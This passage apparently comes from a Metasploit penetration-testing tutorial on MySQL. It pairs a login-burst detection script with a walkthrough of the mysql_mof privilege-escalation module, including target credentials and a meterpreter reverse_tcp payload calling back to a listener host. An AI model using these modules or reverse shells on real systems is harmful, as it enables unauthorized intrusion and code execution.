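# Constructed sample log: 25 rejections for root from one host, one second apart
# (what a wordlist run or the bypass module's repeated attempts look like), plus a
# lone rejection for another account and a startup line that is not a login event.
_t0 = datetime(2021, 6, 4, 12, 39, 0)
SAMPLE_ERROR_LOG = ["2021-06-04T12:38:59.000000Z 0 [Note] /usr/sbin/mysqld: ready for connections."]
SAMPLE_ERROR_LOG += [denied_line(_t0 + timedelta(seconds=i), 10 + i, "root", "192.168.1.113")
                     for i in range(25)]
SAMPLE_ERROR_LOG.append(denied_line(_t0 + timedelta(seconds=30), 40, "app", "10.0.0.5"))


if __name__ == "__main__":
    for a in detect_login_bursts(SAMPLE_ERROR_LOG):
        print(f"{a['count']} rejected logins for {a['user']!r} from {a['host']} "
              f"between {a['first']} and {a['last']}")
```

The bypass module in particular fires hundreds of attempts for a single username in seconds, so even a conservative threshold catches it; a wordlist run spreads the same signature over more time, which is what the window size is for.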
VI. MOF privilege escalation
1 Module overview
Name: Oracle MySQL for Microsoft Windows MOF Execution
Module: exploit/windows/mysql/mysql_mof
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-12-01
Provided by:
kingcope
sinn3r <sinn3r@metasploit.com>
Available targets:
Id Name
-- ----
0 MySQL on Windows prior to Vista
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer yes The password to authenticate with
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
USERNAME root yes The username to authenticate as
Payload information:
Description:
This module takes advantage of a file privilege misconfiguration
problem specifically against Windows MySQL servers (due to the use
of a .mof file). This may result in arbitrary code execution under
the context of SYSTEM. This module requires a valid MySQL account on
the target machine.
In other words: the module abuses a file-privilege misconfiguration specific to Windows MySQL servers (via a .mof file), which can lead to arbitrary code execution in the SYSTEM context; it requires a valid MySQL account on the target machine.
References:
https://nvd.nist.gov/vuln/detail/CVE-2012-5613
OSVDB (88118)
https://www.exploit-db.com/exploits/23083
https://seclists.org/fulldisclosure/2012/Dec/13
2 Walkthrough
msf6 exploit(multi/mysql/mysql_udf_payload) > search mysql_
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_writable_dirs normal No MYSQL Directory Write Test
1 auxiliary/scanner/mysql/mysql_file_enum normal No MYSQL File/Directory Enumerator
2 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump
3 auxiliary/scanner/mysql/mysql_schemadump normal No MYSQL Schema Dump
4 auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal No MySQL Authentication Bypass Password Dump
5 auxiliary/admin/mysql/mysql_enum normal No MySQL Enumeration Module
6 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
7 auxiliary/admin/mysql/mysql_sql normal No MySQL SQL Generic Query
8 auxiliary/scanner/mysql/mysql_version normal No MySQL Server Version Enumeration
9 exploit/linux/mysql/mysql_yassl_getname 2010-01-25 good No MySQL yaSSL CertDecoder::GetName Buffer Overflow
10 exploit/linux/mysql/mysql_yassl_hello 2008-01-04 good No MySQL yaSSL SSL Hello Message Buffer Overflow
11 exploit/windows/mysql/mysql_yassl_hello 2008-01-04 average No MySQL yaSSL SSL Hello Message Buffer Overflow
12 exploit/multi/mysql/mysql_udf_payload 2009-01-16 excellent No Oracle MySQL UDF Payload Execution
13 exploit/windows/mysql/mysql_start_up 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows FILE Privilege Abuse
14 exploit/windows/mysql/mysql_mof 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows MOF Execution
15 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
16 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
Interact with a module by name or index. For example info 16, use 16 or use auxiliary/admin/http/rails_devise_pass_reset
msf6 exploit(multi/mysql/mysql_udf_payload) > use 14
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/mysql/mysql_mof) > options
Module options (exploit/windows/mysql/mysql_mof):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer yes The password to authenticate with
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
USERNAME root yes The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 MySQL on Windows prior to Vista
But because this payload does not support Linux (and the target here is Linux), the attack did not succeed.
Summary
This article has described in detail how to use Metasploit to penetration-test MySQL; it is for learning purposes only.